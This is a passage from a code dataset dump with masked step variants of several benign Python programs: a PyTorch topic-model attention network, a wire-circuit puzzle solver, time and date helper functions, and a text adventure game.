decoder(self, r):\n # p_x_given_h = F.softmax(self.de_bn(self.de(r)))\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == \"word\":\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == \"context\":\n bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith(\"selector\"):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith(\"selector\"):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n ###topic model\n mean, logvar = self.encoder(x) # batchsize*50\n h = self.sampler(mean, logvar, cuda) # batchsize*50\n r = self.generator(h) # batchsize*50\n p_x_given_h = self.decoder(r) # batchsize*dv\n ###HAN\n num_utterance = len(input_list) # one batch doucument_list\n _, batch_size = input_list[0].size()\n # word-level rnn\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"word\")\n word_rnn_output_list = []\n word_attention_dict = {}\n # de_weight = torch.zeros(self.d_v, self.d_t).cuda()\n # de_weight.copy_(self.de.weight.data)\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(word_rnn_output)\n\n # word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)): # word_i word\n for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)\n word_index = int(batch_data[word_i, clause_i]) # word index\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = 
(word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2\n else:\n word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]\n\n ##HAN\n word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n # context-level rnn\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"context\")\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n\n return mean, logvar, p_x_given_h, logit, word_attention_dict",
"step-ids": [
5,
6,
8,
11,
12
]
}
|
[
5,
6,
8,
11,
12
] |
#!/usr/bin/env python3
import sys
import re
from collections import namedtuple
def isnum(name):
return name.startswith('-') or name.isdigit()
class WireValues:
def __init__(self):
self.wires = {}
def __getitem__(self, name):
return int(name) if isnum(name) else self.wires[name]
def __setitem__(self, name, value):
self.wires[name] = value
def __contains__(self, name):
return isnum(name) or name in self.wires
Command = namedtuple('Command', 'pattern function')
WireLink = namedtuple('WireLink', 'command inputs output')
COMMANDS = []
def make_command(expr):
pattern = re.compile('^'+expr.replace('#', '([0-9a-z]+)')+'$')
def command_maker(function):
command = Command(pattern, function)
COMMANDS.append(command)
return command
return command_maker
@make_command('# -> #')
def assignment(wires, v1, name):
wires[name] = wires[v1]
@make_command('# AND # -> #')
def anding(wires, v1, v2, name):
wires[name] = wires[v1] & wires[v2]
@make_command('# OR # -> #')
def oring(wires, v1, v2, name):
wires[name] = wires[v1] | wires[v2]
@make_command('# LSHIFT # -> #')
def lshift(wires, v1, v2, name):
wires[name] = wires[v1] << wires[v2]
@make_command('# RSHIFT # -> #')
def rshift(wires, v1, v2, name):
wires[name] = wires[v1] >> wires[v2]
@make_command('NOT # -> #')
def notting(wires, v1, name):
wires[name] = ((1<<16)-1)&~wires[v1]
def create_link(line):
for cmd in COMMANDS:
m = re.match(cmd.pattern, line)
if m:
gps = m.groups()
return WireLink(cmd, gps[:-1], gps[-1])
raise ValueError(repr(line))
def process_links(links):
wires = WireValues()
while links:
remaining = []
for link in links:
if all(i in wires for i in link.inputs):
link.command.function(wires, *link.inputs, link.output)
else:
remaining.append(link)
links = remaining
return wires
def main():
lines = sys.stdin.read().strip().split('\n')
links = [create_link(line) for line in lines]
wires = process_links(links)
answer = wires['a']
print("Part 1 wire a:", answer)
index = next(i for (i,link) in enumerate(links) if link.output=='b')
links[index] = WireLink(assignment, [str(answer)], 'b')
wires = process_links(links)
answer = wires['a']
print("Part 2 wire a:", answer)
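# --- Illustrative sketch (editor's addition, not part of the original solution) ---
# Shows the instruction format the parsers above expect, on a tiny in-memory
# circuit; the wire names and numbers below are arbitrary examples.
def _demo():
    sample = [
        "123 -> x",
        "456 -> y",
        "x AND y -> d",
        "NOT x -> h",
        "d -> a",
    ]
    wires = process_links([create_link(line) for line in sample])
    print("demo wire a:", wires['a'])  # 123 & 456 == 72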
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "a5eb1f559972519dbe0f3702e03af77e61fbfb4e",
"index": 7985,
"step-1": "<mask token>\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n<mask token>\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n<mask token>\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\n<mask token>\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\nCommand = namedtuple('Command', 'pattern function')\nWireLink = namedtuple('WireLink', 'command inputs output')\nCOMMANDS = []\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\nimport re\n\nfrom collections import namedtuple\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\nclass WireValues:\n def __init__(self):\n self.wires = {}\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n def __setitem__(self, name, value):\n self.wires[name] = value\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\nCommand = namedtuple('Command', 'pattern function')\nWireLink = namedtuple('WireLink', 'command inputs output')\n\nCOMMANDS = []\n\ndef make_command(expr):\n pattern = re.compile('^'+expr.replace('#', '([0-9a-z]+)')+'$')\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = ((1<<16)-1)&~wires[v1]\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print(\"Part 1 wire a:\", answer)\n index = next(i for (i,link) in enumerate(links) if link.output=='b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print(\"Part 2 wire a:\", answer)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
7,
14,
16,
18,
20
]
}
|
[
7,
14,
16,
18,
20
] |
# -*- coding: utf-8 -*-
import time
import datetime
def get_second_long(time_str=None):
if time_str is None:
return long(time.time())
time_array = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
return long(time.mktime(time_array))
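# Usage illustration (editor's addition, not in the original module):
#   get_second_long("2021-06-01 12:00:00")  # epoch seconds for that local time
#   get_second_long()                        # epoch seconds for "now"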
def get_curtime_str():
return datetime.datetime.now()
def get_curtimestamp():
return int(time.time() * 1000)
def get_curdatetime_format():
return get_curtime_str().strftime("%Y-%m-%d %H:%M:%S")
def get_curdate_format():
return get_curtime_str().strftime("%Y-%m-%d")
def get_curmonth_format():
return get_curtime_str().strftime("%Y-%m")
def get_curhour_str():
return get_curtime_str().hour
def get_curminuter_str():
return get_curtime_str().minute
def get_curday_str():
return get_curtime_str().day
def get_curdate_str():
return get_curtime_str().strftime("%Y%m%d")
def get_curdatetime_str():
return get_curtime_str().strftime("%Y%m%d%H%M%S")
# renamed: a second get_curminuter_str() here would silently shadow the
# minute-of-hour helper defined above
def get_curminute_datetime_str():
    return get_curtime_str().strftime("%Y%m%d%H%M")
|
normal
|
{
"blob_id": "e735529eddd3a46ea335e593e5937558b50b142d",
"index": 2276,
"step-1": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\n<mask token>\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-3": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-4": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\ndef get_curhour_str():\n return get_curtime_str().hour\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport time\nimport datetime\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n return long(time.mktime(time_array))\n\n\ndef get_curtime_str():\n return datetime.datetime.now()\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime(\"%Y-%m-%d\")\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime(\"%Y-%m\")\n\n\ndef get_curhour_str():\n return get_curtime_str().hour\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime(\"%Y%m%d\")\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime(\"%Y%m%d%H%M\")\n\n\n\n\n\n",
"step-ids": [
7,
9,
10,
11,
14
]
}
|
[
7,
9,
10,
11,
14
] |
from room import Room
from player import Player
from item import Item
# Declare all the rooms
items = {
'scimitar': Item('Scimitar', '+7 Attack'),
'mace': Item('Mace', '+13 Attack'),
'tower_shield': Item('Tower Shield', '+8 Block'),
'heraldic_shield': Item('Heraldic Shield', '+12 Block'),
'chainmail': Item('Chainmail', '+15 Defense'),
'gold_plate': Item('Gold Plate', '+25 Defense'),
'health_potion': Item('Health Potion', 'Heal 10 HP'),
'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),
'gold': Item('Gold', 'Currency for other items from vendors'),
'demon_heart': Item('Demon Heart', 'Bestows owner with great power')
}
room = {
'outside': Room("Outside Cave Entrance",
"""North of you, the cave mount beckons""",
[items['scimitar'], items['health_potion']]),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east.""",
[items['tower_shield'], items['chainmail']]),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm.""",
[items['mace'], items['mana_potion']]),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""",
[items['gold_plate'], items['heraldic_shield']]),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south.""",
[items['gold'], items['demon_heart']]),
}
# Link rooms together
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']
# Main
player = Player(room['outside'])
suppressRoomPrint = False
while True:
if suppressRoomPrint:
suppressRoomPrint = False
else:
print (player.location)
print (f'\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n')
inp = input("What is your command: ")
if inp == "q":
break
if inp == "n" or inp == "s" or inp == "w" or inp == "e":
newRoom = player.location.getRoomInDirection(inp)
if newRoom == None:
print('\x1b[1;37;41m + \nImpossible, try again.\n\x1b[0m')
suppressRoomPrint = True
else:
player.change_location(newRoom)
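# Editor's note (illustrative, inferred from the usage above; the real
# room.py / player.py / item.py are not shown here): the imported classes
# only need roughly this surface to support the loop:
#   Item(name, description)
#   Room(name, description, items) with n_to/s_to/e_to/w_to attributes,
#       getItems(), and getRoomInDirection(direction) returning a Room or None
#   Player(starting_room) with .location and change_location(room)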
|
normal
|
{
"blob_id": "07a172c28057dc803efdbdc10a9e2e11df4e527b",
"index": 3134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-3": "<mask token>\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-4": "from room import Room\nfrom player import Player\nfrom item import Item\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
